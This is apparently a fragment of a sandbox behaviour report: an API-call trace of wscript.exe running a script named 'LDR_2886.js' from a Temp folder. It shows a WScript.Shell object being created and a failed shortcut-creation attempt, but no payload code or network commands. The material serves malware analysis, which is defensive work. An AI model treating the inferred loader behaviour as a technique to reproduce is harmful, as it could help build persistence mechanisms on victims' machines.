	[0115.242] ??2@YAPEAX_K@Z () returned 0x394850
	[0115.244] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.469] ??2@YAPEAX_K@Z () returned 0x39c7e0
	[0115.471] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.475] ??2@YAPEAX_K@Z () returned 0x39afd0
	[0115.477] ??2@YAPEAX_K@Z () returned 0x37e0a0
	[0115.477] GetTickCount () returned 0x2d44e
	[0115.477] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.482] ??2@YAPEAX_K@Z () returned 0x3f30f0
	[0115.484] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.487] ??2@YAPEAX_K@Z () returned 0x3f3930
	[0115.490] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.493] ??2@YAPEAX_K@Z () returned 0x39c8a0
	[0115.496] ??2@YAPEAX_K@Z () returned 0x37e120
	[0115.496] GetTickCount () returned 0x2d46d
	[0115.496] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.496] free (_Block=0x3c4410) 
	[0115.496] free (_Block=0x375550) 
	[0115.496] free (_Block=0x398730) 
	[0115.496] free (_Block=0x3c3000) 
	[0115.496] free (_Block=0x3b3000) 
	[0115.496] free (_Block=0x38acc0) 
	[0115.496] free (_Block=0x37e9e0) 
	[0115.496] ??3@YAXPEAX@Z () returned 0x46511f01
	[0115.497] ??3@YAXPEAX@Z () returned 0x46511f01
	[0115.501] ??2@YAPEAX_K@Z () returned 0x37bef0
	[0115.503] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.503] GetTickCount () returned 0x2d46d
	[0115.503] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.506] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0115.506] IUnknown:Release (This=0x27f420) returned 0x1
	[0115.506] GetTickCount () returned 0x2d46d
	[0115.508] ??2@YAPEAX_K@Z () returned 0x3f9f00
	[0115.733] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.738] ??2@YAPEAX_K@Z () returned 0x3fa5c0
	[0115.740] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0115.743] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0115.743] IUnknown:Release (This=0x27f420) returned 0x1
	[0115.743] GetTickCount () returned 0x2d557
	[0115.746] ??2@YAPEAX_K@Z () returned 0x402e30
	[0115.748] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.752] ??2@YAPEAX_K@Z () returned 0x403a30
	[0115.754] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.759] ??2@YAPEAX_K@Z () returned 0x37e0a0
	[0115.761] ??2@YAPEAX_K@Z () returned 0x37e110
	[0115.767] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.774] ??2@YAPEAX_K@Z () returned 0x393120
	[0116.076] MulDiv (nNumber=941, nNumerator=100, nDenominator=3335) returned 28
	[0116.076] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.076] GetTickCount () returned 0x2d6af
	[0116.080] MulDiv (nNumber=985, nNumerator=100, nDenominator=3412) returned 29
	[0116.080] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.080] GetTickCount () returned 0x2d6af
	[0116.083] MulDiv (nNumber=997, nNumerator=100, nDenominator=3476) returned 29
	[0116.083] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.084] GetTickCount () returned 0x2d6af
	[0116.088] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3496) returned 29
	[0116.088] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.088] GetTickCount () returned 0x2d6be
	[0116.090] MulDiv (nNumber=1128, nNumerator=100, nDenominator=3607) returned 31
	[0116.090] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.090] GetTickCount () returned 0x2d6be
	[0116.094] MulDiv (nNumber=984, nNumerator=100, nDenominator=3525) returned 28
	[0116.094] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.094] GetTickCount () returned 0x2d6be
	[0116.098] MulDiv (nNumber=980, nNumerator=100, nDenominator=3576) returned 27
	[0116.098] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.098] GetTickCount () returned 0x2d6be
	[0116.101] MulDiv (nNumber=979, nNumerator=100, nDenominator=3636) returned 27
	[0116.101] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.101] GetTickCount () returned 0x2d6be
	[0116.106] MulDiv (nNumber=990, nNumerator=100, nDenominator=3729) returned 27
	[0116.106] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.106] GetTickCount () returned 0x2d6ce
	[0116.110] MulDiv (nNumber=1186, nNumerator=100, nDenominator=3760) returned 32
	[0116.110] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.110] GetTickCount () returned 0x2d6ce
	[0116.113] MulDiv (nNumber=969, nNumerator=100, nDenominator=3591) returned 27
	[0116.113] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.113] GetTickCount () returned 0x2d6ce
	[0116.117] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3620) returned 28
	[0116.117] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.117] GetTickCount () returned 0x2d6ce
	[0116.291] MulDiv (nNumber=958, nNumerator=100, nDenominator=3645) returned 26
	[0116.291] IUnknown:Release (This=0x27f420) returned 0x1
	[0116.291] GetTickCount () returned 0x2d789
	[0116.302] _resetstkoflw () returned 0x1
	[0116.303] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x220718
	[0116.303] LoadResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x220b6c
	[0116.303] LockResource (hResData=0x220b6c) returned 0x220b6c
	[0116.303] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x86
	[0116.305] FreeResource (hResData=0x220b6c) returned 0
	[0116.305] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x2207e8
	[0116.305] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0x221c74
	[0116.305] LockResource (hResData=0x221c74) returned 0x221c74
	[0116.305] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0xce
	[0116.306] FreeResource (hResData=0x221c74) returned 0
	[0116.306] GetTickCount () returned 0x2d799
	[0116.306] bsearch (_Key=0x63148, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0116.306] ??2@YAPEAX_K@Z () returned 0x371420
	[0116.308] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0116.308] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0116.308] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x14cd80 | out: lpclsid=0x14cd80*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0116.311] SysStringLen (param_1=0x0) returned 0x0
	[0116.311] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0116.311] CoGetClassObject (in: rclsid=0x14cd80*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee1476300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14cd50 | out: ppv=0x14cd50*=0x3f9380) returned 0x0
	[0116.317] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14b020 | out: lpSystemTimeAsFileTime=0x14b020*(dwLowDateTime=0xbd942470, dwHighDateTime=0x1d543d1)) 
	[0116.317] GetCurrentProcessId () returned 0x6a8
	[0116.317] GetCurrentThreadId () returned 0x794
	[0116.317] GetTickCount () returned 0x2d799
	[0116.317] QueryPerformanceCounter (in: lpPerformanceCount=0x14b028 | out: lpPerformanceCount=0x14b028*=24074309190) returned 1
	[0116.317] malloc (_Size=0x100) returned 0x3f8cb0
	[0116.317] GetVersionExA (in: lpVersionInformation=0x14ae00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe15a2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe1590000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x14ae00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0116.317] GetUserDefaultLCID () returned 0x409
	[0116.317] ??2@YAPEAX_K@Z () returned 0x3f9380
	[0116.318] ??2@YAPEAX_K@Z () returned 0x4078a0
	[0116.318] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14cb80, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0116.318] lstrlenA (lpString="\\wscript.exe") returned 12
	[0116.318] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0116.318] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0116.318] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0116.318] GetProcAddress (hModule=0xffa90000, lpProcName=0x1) returned 0xffa9d7f8
	[0116.318] ??3@YAXPEAX@Z () returned 0x3b003e0001
	[0116.318] GetTickCount () returned 0x2d799
	[0116.318] malloc (_Size=0x808) returned 0x405ff0
	[0117.786] CreateErrorInfo (in: pperrinfo=0x14be20 | out: pperrinfo=0x14be20*=0x2aa718) returned 0x0
	[0117.787] CErrorObject::SetGUID () returned 0x0
	[0117.787] CErrorObject::SetSource () returned 0x0
	[0117.787] LoadStringW (in: hInstance=0x7fee1590000, uID=0x1004, lpBuffer=0x14a560, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0117.788] FormatMessageW (in: dwFlags=0x500, lpSource=0x2ae5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x14be30, nSize=0x0, Arguments=0x14bea0 | out: lpBuffer="\xb4b0\x2f") returned 0x31
	[0117.788] CErrorObject::SetDescription () returned 0x0
	[0117.788] CErrorObject::SetHelpFile () returned 0x0
	[0117.788] CErrorObject::SetHelpContext () returned 0x0
	[0117.788] QueryInterface () returned 0x0
	[0117.788] SetErrorInfo (dwReserved=0x0, perrinfo=0x2aa710) returned 0x0
	[0117.788] Release () returned 0x2
	[0117.788] IUnknown:Release (This=0x2aa710) returned 0x1
	[0117.788] LocalFree (hMem=0x2fb4b0) returned 0x0
	[0117.789] IUnknown:Release (This=0x2fa220) returned 0x1
	[0117.789] GetTickCount () returned 0x2dd53
	[0117.789] bsearch (_Key=0x14cf88, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a3e0
	[0117.789] ??2@YAPEAX_K@Z () returned 0x416db0
	[0117.791] SetItemAlloc () returned 0x0
	[0117.791] IUnknown:AddRef (This=0x3f9020) returned 0x2
	[0117.791] Release () returned 0x1
	[0117.791] QueryInterface () returned 0x80004002
	[0117.791] QueryInterface () returned 0x80004002
	[0117.791] QueryInterface () returned 0x80004002
	[0117.791] QueryInterface () returned 0x80004002
	[0117.791] QueryInterface () returned 0x0
	[0117.791] Release () returned 0x1
	[0117.791] realloc (_Block=0x3b2b40, _Size=0x140) returned 0x3831b0
	[0117.796] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0117.796] IUnknown:Release (This=0x27f420) returned 0x1
	[0117.796] GetTickCount () returned 0x2dd63
	[0117.799] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0117.799] IUnknown:Release (This=0x27f420) returned 0x1
	[0117.799] GetTickCount () returned 0x2dd63
	[0117.801] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x220718
	[0117.801] LoadResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x220b6c
	[0117.801] LockResource (hResData=0x220b6c) returned 0x220b6c
	[0117.801] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x86
	[0117.802] FreeResource (hResData=0x220b6c) returned 0
	[0117.802] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x2207e8
	[0117.802] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0x221c74
	[0117.802] LockResource (hResData=0x221c74) returned 0x221c74
	[0117.803] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0xce
	[0117.803] FreeResource (hResData=0x221c74) returned 0
	[0117.803] bsearch (_Key=0x63148, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0119.309] SendMessageA (hWnd=0xa0184, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0119.311] SendMessageA (hWnd=0xa0184, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0119.311] PostMessageA (hWnd=0xa0184, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0119.312] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14f7c0*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0119.312] CloseHandle (hObject=0xd4) returned 1
	[0119.312] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.312] IUnknown:Release (This=0x28e5f0) returned 0x0
	[0119.313] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.313] IUnknown:Release (This=0x28e6a0) returned 0x0
	[0119.313] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.313] IUnknown:Release (This=0x28e750) returned 0x0
	[0119.313] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.313] IUnknown:Release (This=0x28e540) returned 0x0
	[0119.313] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.313] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.314] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.314] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.314] GetProcessHeap () returned 0x260000
	[0119.314] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2cae20 | out: hHeap=0x260000) returned 1
	[0119.315] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.315] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x14f7f0 | out: lplpMessageFilter=0x14f7f0*=0x555f80) returned 0x0
	[0119.315] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.315] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.315] ??3@YAXPEAX@Z () returned 0x46511f01
	[0119.315] CoUninitialize () 
	[0119.315] DllCanUnloadNow () returned 0x0
	[0119.315] DllCanUnloadNow () 

Thread:
	id = 281
	os_tid = 0xa34


Thread:
	id = 282
	os_tid = 0x178

	[0110.407] GetClassInfoA (in: hInstance=0xffa90000, lpClassName="WSH-Timer", lpWndClass=0x227fda0 | out: lpWndClass=0x227fda0) returned 0
	[0110.407] RegisterClassA (lpWndClass=0x227fda0) returned 0x9006ac138
	[0110.407] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xffa90000, lpParam=0x555a60) returned 0xa0184
	[0110.408] GetWindowLongPtrA (hWnd=0xa0184, nIndex=-21) returned 0x0
	[0110.408] NtdllDefWindowProc_A (hWnd=0xa0184, Msg=0x24, wParam=0x0, lParam=0x227f790) returned 0x0
	[0110.408] GetWindowLongPtrA (hWnd=0xa0184, nIndex=-21) returned 0x0
	[0110.408] SetWindowLongPtrA (hWnd=0xa0184, nIndex=-21, dwNewLong=0x555a60) returned 0x0
	[0110.408] NtdllDefWindowProc_A (hWnd=0xa0184, Msg=0x81, wParam=0x0, lParam=0x227f750) returned 0x1
	[0110.409] GetWindowLongPtrA (hWnd=0xa0184, nIndex=-21) returned 0x555a60
	[0110.409] NtdllDefWindowProc_A (hWnd=0xa0184, Msg=0x83, wParam=0x0, lParam=0x227f7b0) returned 0x0
	[0110.411] GetWindowLongPtrA (hWnd=0xa0184, nIndex=-21) returned 0x555a60
	[0110.411] NtdllDefWindowProc_A (hWnd=0xa0184, Msg=0x1, wParam=0x0, lParam=0x227f750) returned 0x0
	[0110.411] SetEvent (hEvent=0xcc) returned 1
	[0110.518] GetMessageA (in: lpMsg=0x227fd70, hWnd=0xa0184, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x227fd70) returned 0
	[0119.309] GetWindowLongPtrA (hWnd=0xa0184, nIndex=-21) returned 0x555a60
	[0119.311] GetWindowLongPtrA (hWnd=0xa0184, nIndex=-21) returned 0x555a60

Thread:
	id = 283
	os_tid = 0x70c


Thread:
	id = 284
	os_tid = 0x4b4


Thread:
	id = 285
	os_tid = 0x9c4


Thread:
	id = 286
	os_tid = 0x408


Thread:
	id = 287
	os_tid = 0x7c4


Thread:
	id = 302
	os_tid = 0xa00


Thread:
	id = 306
	os_tid = 0xa3c


Process:
	id = "35"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x315f5000"
	os_pid = "0x978"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 289
	os_tid = 0x8ec

	[0114.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25f780 | out: lpSystemTimeAsFileTime=0x25f780*(dwLowDateTime=0xbcbb8750, dwHighDateTime=0x1d543d1)) 
	[0114.890] GetCurrentProcessId () returned 0x978
	[0114.890] GetCurrentThreadId () returned 0x8ec
	[0114.890] GetTickCount () returned 0x2d20d
	[0114.890] QueryPerformanceCounter (in: lpPerformanceCount=0x25f788 | out: lpPerformanceCount=0x25f788*=23931632933) returned 1
	[0114.890] GetStartupInfoA (in: lpStartupInfo=0x25f7a0 | out: lpStartupInfo=0x25f7a0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0114.892] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0114.892] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0114.892] GetVersionExA (in: lpVersionInformation=0x25f6c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3f1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25f6c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0114.892] GetUserDefaultLCID () returned 0x409
	[0114.893] CoInitialize (pvReserved=0x0) returned 0x0
	[0114.905] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0114.905] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0114.905] ??2@YAPEAX_K@Z () returned 0x3b57b0
	[0114.905] ??2@YAPEAX_K@Z () returned 0x3b5f60
	[0114.905] GetCurrentThreadId () returned 0x8ec
	[0114.905] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f408 | out: phkResult=0x25f408*=0x7c) returned 0x0
	[0114.905] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f400 | out: phkResult=0x25f400*=0x80) returned 0x0
	[0114.905] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25e708, lpData=0x25eb10, lpcbData=0x25e700*=0x400 | out: lpType=0x25e708*=0x0, lpData=0x25eb10*=0x67, lpcbData=0x25e700*=0x400) returned 0x2
	[0114.905] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x25e708, lpData=0x25eb10, lpcbData=0x25e700*=0x400 | out: lpType=0x25e708*=0x0, lpData=0x25eb10*=0x67, lpcbData=0x25e700*=0x400) returned 0x2
	[0114.905] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x25e708, lpData=0x25eb10, lpcbData=0x25e700*=0x400 | out: lpType=0x25e708*=0x0, lpData=0x25eb10*=0x67, lpcbData=0x25e700*=0x400) returned 0x2
	[0114.905] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0115.667] RegCloseKey (hKey=0x80) returned 0x0
	[0115.667] RegCloseKey (hKey=0x7c) returned 0x0
	[0115.667] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f120 | out: phkResult=0x25f120*=0x7c) returned 0x0
	[0115.667] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f118 | out: phkResult=0x25f118*=0x80) returned 0x0
	[0115.667] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25e428, lpData=0x25e830, lpcbData=0x25e420*=0x400 | out: lpType=0x25e428*=0x0, lpData=0x25e830*=0x0, lpcbData=0x25e420*=0x400) returned 0x2
	[0115.667] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25e428, lpData=0x25e830, lpcbData=0x25e420*=0x400 | out: lpType=0x25e428*=0x0, lpData=0x25e830*=0x0, lpcbData=0x25e420*=0x400) returned 0x2
	[0115.667] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25e428, lpData=0x25e830, lpcbData=0x25e420*=0x400 | out: lpType=0x25e428*=0x0, lpData=0x25e830*=0x0, lpcbData=0x25e420*=0x400) returned 0x2
	[0115.667] RegCloseKey (hKey=0x80) returned 0x0
	[0115.667] RegCloseKey (hKey=0x7c) returned 0x0
	[0115.667] GetACP () returned 0x4e4
	[0115.667] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0115.667] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0115.667] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0115.667] FreeLibrary (hLibModule=0x77040000) returned 1
	[0115.667] ??2@YAPEAX_K@Z () returned 0x3b5f80
	[0115.668] CoRegisterMessageFilter (in: lpMessageFilter=0x3b5f80, lplpMessageFilter=0x3b5f90 | out: lplpMessageFilter=0x3b5f90*=0x0) returned 0x0
	[0115.668] GetModuleFileNameW (in: hModule=0xffa90000, lpFilename=0x25f460, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0115.669] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x25edb0 | out: lpdwHandle=0x25edb0) returned 0x704
	[0115.669] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x25e6a0 | out: lpData=0x25e6a0) returned 1
	[0115.669] VerQueryValueW (in: pBlock=0x25e6a0, lpSubBlock="\\", lplpBuffer=0x25edb8, puLen=0x25edb4 | out: lplpBuffer=0x25edb8*=0x25e6c8, puLen=0x25edb4) returned 1
	[0115.669] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25ee08 | out: phkResult=0x25ee08*=0x7c) returned 0x0
	[0115.669] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25e158, lpData=0x25e560, lpcbData=0x25e150*=0x400 | out: lpType=0x25e158*=0x0, lpData=0x25e560*=0x0, lpcbData=0x25e150*=0x400) returned 0x2
	[0115.669] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25edc0 | out: phkResult=0x25edc0*=0x80) returned 0x0
	[0115.669] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25ed84, lpData=0x25ee00, lpcbData=0x25ed80*=0x4 | out: lpType=0x25ed84*=0x0, lpData=0x25ee00*=0x30, lpcbData=0x25ed80*=0x4) returned 0x2
	[0115.669] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e158, lpData=0x25e560, lpcbData=0x25e150*=0x400 | out: lpType=0x25e158*=0x0, lpData=0x25e560*=0x0, lpcbData=0x25e150*=0x400) returned 0x2
	[0115.669] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25ed84, lpData=0x25ee00, lpcbData=0x25ed80*=0x4 | out: lpType=0x25ed84*=0x0, lpData=0x25ee00*=0x30, lpcbData=0x25ed80*=0x4) returned 0x2
	[0115.670] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e158, lpData=0x25e560, lpcbData=0x25e150*=0x400 | out: lpType=0x25e158*=0x1, lpData="1", lpcbData=0x25e150*=0x4) returned 0x0
	[0115.670] lstrlenW (lpString="1") returned 1
	[0115.670] lstrlenW (lpString="0") returned 1
	[0115.670] lstrlenW (lpString="1") returned 1
	[0115.670] lstrlenW (lpString="no") returned 2
	[0115.670] lstrlenW (lpString="1") returned 1
	[0115.670] lstrlenW (lpString="false") returned 5
	[0115.670] RegCloseKey (hKey=0x80) returned 0x0
	[0115.670] RegCloseKey (hKey=0x7c) returned 0x0
	[0115.670] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25ee08, lpdwDisposition=0x0 | out: phkResult=0x25ee08*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0115.670] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25eda4, lpData=0x25ee00, lpcbData=0x25eda0*=0x4 | out: lpType=0x25eda4*=0x0, lpData=0x25ee00*=0x30, lpcbData=0x25eda0*=0x4) returned 0x2
